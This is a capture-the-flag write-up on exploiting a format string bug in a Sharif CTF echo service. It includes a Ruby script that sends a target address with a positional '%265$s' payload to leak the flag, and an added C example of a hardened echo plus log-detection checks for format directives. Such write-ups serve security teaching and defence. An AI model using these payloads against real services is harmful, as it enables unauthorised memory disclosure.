Task:
This service accepts our input and echoes it back using a variant of the printf function. As you might have already understood, there will be a format string vulnerability.

nc ctf.sharif.edu 15478
Our attack will consist of the following steps:
1) locate the target string to print
2) locate our input on the stack and calculate its argument number
3) send the address from step 1 followed by a %s conversion with that argument number to read the key
Firstly, we have to find our target. There is a string in the .bss segment that holds the flag read from the file. We can obtain its address using objdump -t sweet. It's 0x0804b0c0.
Secondly, we will locate our input using gdb. Let's set a breakpoint somewhere in the serve function and enable child debugging after fork (set follow-fork-mode child). Then print the approximate $esp and a lot of values on the stack to locate your input. You can calculate the offset without printing the stack, but that will require some math and assembly skills :) . In my case $esp was 0xffffd510 and the input was located at 0xffffd51c. After testing nearby values it turned out that argument 265 is the 4-byte dword taken from our input.
So all we have to do is change that address to the target.
Script that does the work:
require "socket"

# Argument number found with gdb; the range is kept so nearby values can be rescanned.
(265..265).each do |arg|
  sock = TCPSocket.new("ctf.sharif.edu", 15478)
  # Target address (0x0804b0c0, little-endian) followed by the positional
  # %x (shows the dword we placed) and the %s that prints the flag.
  sock.puts("\xc0\xb0\x04\x08%#{arg}$08x - %#{arg}$s")
  puts "ARG: #{arg}"
  1.times do
    result = sock.gets
    puts result
  end
  sock.close
  sleep(1)
end

Same here. I've lost the key, but it was some md5 :) .
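The root cause above is client input reaching a printf variant as the format string. As an added example (not the challenge binary's code, nor the write-up's), the hardened echo beside a small input check a service owner could run over request logs; the buffer size and the sample probe are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <ctype.h>

/* Bug class from the write-up, kept as a comment only, never compiled in:
 *     printf(input);   // input = "\xc0\xb0\x04\x08%265$08x - %265$s"
 * Hardened echo: the format is a constant and input is only a %s argument,
 * so every '%' in it prints literally. Returns the rendered text from a
 * static buffer (assumed 256 bytes; longer input is truncated). */
const char *echo_fixed(const char *input) {
    static char out[256];
    snprintf(out, sizeof out, "%s", input);
    return out;
}

/* Counts printf conversion directives in untrusted text; usable as a
 * detection rule over request logs. "%%" is a literal percent, not counted. */
int count_format_directives(const char *s) {
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }  /* escaped percent */
        if (s[1] == '\0') break;             /* lone trailing '%' */
        n++;
    }
    return n;
}

/* True if the text carries a positional "%N$" directive such as "%265$s",
 * the form the write-up uses to pick one stack slot. */
bool has_positional_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        const char *p = s + 1;
        while (isdigit((unsigned char)*p)) p++;
        if (p > s + 1 && *p == '$') return true;
    }
    return false;
}

int main(void) {
    const char *probe = "AAAA%265$08x - %265$s";  /* constructed sample */
    printf("echo: %s\n", echo_fixed(probe));
    printf("directives=%d positional=%d\n",
           count_format_directives(probe), (int)has_positional_directive(probe));
    return 0;
}
```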